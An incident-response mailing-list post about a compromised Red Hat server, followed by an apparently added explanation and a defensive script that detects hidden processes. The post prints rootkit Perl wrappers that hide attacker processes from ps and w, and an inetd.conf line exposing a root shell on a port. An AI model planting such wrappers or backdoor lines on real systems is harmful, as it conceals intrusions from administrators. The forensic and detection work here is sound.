Security Incidents mailing list archives
nouser - rootkit ?
From: "Dan Uscatu" <duscatu () phenomedia ro>
Date: Mon, 11 Feb 2002 01:44:31 +0200
Hi,
I found something funny happening today when I tried to install a web server on a customer's machine:
1. w - returned some weird "/usr/bin/perl" processes
2. ps - was not showing everything
3. two connections to some IRC servers; fuser finds the process IDs for them, but ps does not show them
Some info about the server (unfortunately it wasn't installed by me...):
[root@www root]# uname -a
Linux www 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown (compiled in
the future too, lol)
[root@www /root]# cat /etc/redhat-release
Red Hat Linux release 7.1 (Seawolf)
More digging... so I found some modified files:
[root@www nouser]# ls -l /bin/ps
-rwxr-xr-x 1 nouser nouser 188 Mar 2 15:45 /bin/ps
[root@www /root]# cat /bin/ps
#!/usr/bin/perl
$xargs =join(' ',@ARGV);
$ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
print "$ps";
[root@www /root]# ls -l /usr/lib/libxnotps
-r-xr-xr-x 1 root root 64092 Apr 5 2001 /usr/lib/libxnotps
[root@www nouser]# ls -l /usr/bin/w
-rwxr-xr-x 1 nouser nouser 105 Jan 20 01:03 /usr/bin/w
[root@www /root]# cat /usr/bin/w
#!/usr/bin/perl
$xargs =join(' ',@ARGV);
$w = `/usr/lib/libxyotps $xargs \| grep -v nouser`;
print "$w";
[root@www /root]# ls -l /usr/lib/libxyotps
-r-xr-xr-x 1 root root 8688 Apr 5 2001 /usr/lib/libxyotps
There is another file called /usr/lib/libxzotps, but I couldn't find what is pointing at that, yet.
No reference found on the web, searching for "libxnotps" or "libxyotps" or "libxzotps".
[root@www nouser]# grep nouser /etc/passwd
nouser:x:502:502::/sbin/nouser:/bin/bash
[root@www nouser]# ls -l /sbin/nouser
total 3328
-rw-r--r-- 1 nouser nouser 80092 Mar 2 23:22 broadcast-5000.log
-rw-r--r-- 1 nouser nouser 3057793 Mar 2 23:22 broadcast-full.log
drwxr-xr-x 2 nouser nouser 4096 Mar 2 13:01 Desktop
drwxrwxr-x 4 nouser nouser 4096 Mar 5 19:23 iroffer
-rw-rw-r-- 1 nouser nouser 206865 Mar 5 19:23 iroffer.tar.gz
-rwsr-xr-x 1 root root 13855 Mar 2 13:04 nouser
-rw-rw-r-- 1 root root 2215 Mar 2 23:23 packet0r.pl
drwxrwxr-x 3 nouser nouser 4096 Jan 20 01:15 scan-1
drwxr-xr-x 3 nouser root 4096 Mar 2 13:04 scan-2
drwxr-xr-x 3 nouser root 4096 Mar 2 13:04 scan-3
drwxrwxr-x 3 nouser nouser 4096 Jan 20 01:13 war
Of course the SUID "nouser" gives a root shell... and the directories are full of war scripts, flood tools, and warez... given away through IRC bots.
I have scanned the machine using chkrootkit... the only funny thing found was an inetd.conf, containing:
[root@www nouser]# cat /etc/inetd.conf
65456 stream tcp nowait root /bin/sh sh
Of course, inetd is not installed :) That points me to the idea that the process was somehow automated... but I can't find any reference to a rootkit that does these changes. Seems pretty stupid for a rootkit anyway... but I want to be sure no other major changes were made... before I install the production server there.
Thanks for any comments.
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
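The hiding technique in the post above is purely userland: ps and w are replaced by Perl scripts that run the real binary from /usr/lib and pipe its output through `grep -v nouser` (and a few more patterns). /proc is untouched, which is why fuser still found the PIDs behind the IRC connections. The script below is an added example, not code from the original message or from any rootkit, that turns the poster's three observations into checks: a system binary that starts with `#!` instead of ELF magic, PIDs present in /proc but missing from ps, and PIDs that hold sockets but are missing from ps. The extra file names in the `--scan` section (/usr/bin/top, /bin/netstat, /bin/ls) are assumptions about other commonly replaced tools; the /proc layout used is the ordinary Linux one, and the inputs in the usage note are constructed.

```shell
#!/bin/sh
# Added example (not code from the original post): checks for the userland
# hiding trick described above, where ps and w are Perl wrappers that run the
# real binary and `grep -v` the attacker's lines away.  The functions take
# their inputs as arguments so they can be exercised on constructed data;
# run with "--scan" to apply them to the live system.

# Check 1: a "binary" that is really an interpreter script.
# The wrappers in the post start with "#!/usr/bin/perl"; a genuine ps is an
# ELF executable whose first bytes are "\177ELF", so two bytes are enough.
is_script_wrapper() {
    [ "$(dd if="$1" bs=1 count=2 2>/dev/null)" = "#!" ]
}

# Check 2: PIDs the kernel reports but the tool does not print.
# $1: file with one PID per line from the kernel's view (e.g. `ls /proc`)
# $2: file with the tool's view (e.g. `ps -e -o pid=`); header lines are ignored
# A grep -v wrapper cannot remove a process from /proc, so whatever it filters
# out of ps shows up here.
hidden_pids() {
    k=$(mktemp) && t=$(mktemp) || return 1
    grep -E '^[0-9]+$' "$1" | sort -u > "$k"
    grep -E '^[0-9]+$' "$2" | sort -u > "$t"
    comm -23 "$k" "$t"      # lines present only in the kernel list
    rm -f "$k" "$t"
}

# Check 3: PIDs that own a socket, read from the /proc tree rooted at $1.
# This is the `fuser` observation from the post done by hand: every open
# socket is an fd symlink of the form "socket:[inode]" under /proc/PID/fd.
socket_pids() {
    for p in "$1"/[0-9]*; do
        for fd in "$p"/fd/*; do
            [ -L "$fd" ] || continue
            case $(readlink "$fd") in
                socket:*) printf '%s\n' "${p##*/}"; break ;;
            esac
        done
    done | sort -u
}

# Socket owners that ps does not list: the exact symptom of the two IRC
# connections in the post.  $1: /proc root, $2: file with ps's PID list.
hidden_socket_pids() {
    s=$(mktemp) || return 1
    socket_pids "$1" > "$s"
    hidden_pids "$s" "$2"
    rm -f "$s"
}

if [ "${1-}" = "--scan" ]; then
    # /bin/ps and /usr/bin/w are from the post; the rest are assumed targets
    for f in /bin/ps /usr/bin/w /usr/bin/top /bin/netstat /bin/ls; do
        [ -e "$f" ] && is_script_wrapper "$f" && printf 'script wrapper: %s\n' "$f"
    done
    # system binaries not owned by root, like the nouser-owned ps and w above
    find /bin /sbin /usr/bin /usr/sbin ! -user root -print 2>/dev/null
    ps_list=$(mktemp) && kernel_list=$(mktemp) || exit 1
    ps -e -o pid= > "$ps_list"
    ls /proc > "$kernel_list"
    echo "PIDs in /proc but not in ps:";  hidden_pids "$kernel_list" "$ps_list"
    echo "socket-owning PIDs not in ps:"; hidden_socket_pids /proc "$ps_list"
    rm -f "$ps_list" "$kernel_list"
fi
```

Run it as `sh check.sh --scan` on the suspect host from a shell whose PATH points at known-good binaries (a rescue disk or a statically linked toolkit), since the wrapped ps would otherwise be the thing producing the "ps's view" file. Any PID that appears in the /proc-but-not-ps list deserves a look at /proc/PID/exe and /proc/PID/cmdline, and a non-empty socket-owners list is the same evidence fuser gave the poster.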
Current thread:
- nouser - rootkit ? Dan Uscatu (Mar 10)
- Re: nouser - rootkit ? Eric Brandwine (Mar 11)
- Re: nouser - rootkit ? Ryan Russell (Mar 11)
- Re: nouser - rootkit ? Konrad Rieck (Mar 11)
- Re: nouser - rootkit ? Bruce Ediger (Mar 12)
- Re: nouser - rootkit ? Kyle R Maxwell (Mar 12)
- Re: nouser - rootkit ? Jose Nazario (Mar 12)
- Re: nouser - rootkit ? Eric Brandwine (Mar 12)
- Re: nouser - rootkit ? [:multiple root kit thread:] Dan Rohan (Mar 12)
- Re: nouser - rootkit ? Dave Dittrich (Mar 12)
- Re: nouser - rootkit ? Eric Brandwine (Mar 12)
- Re: nouser - rootkit ? Eric Brandwine (Mar 11)
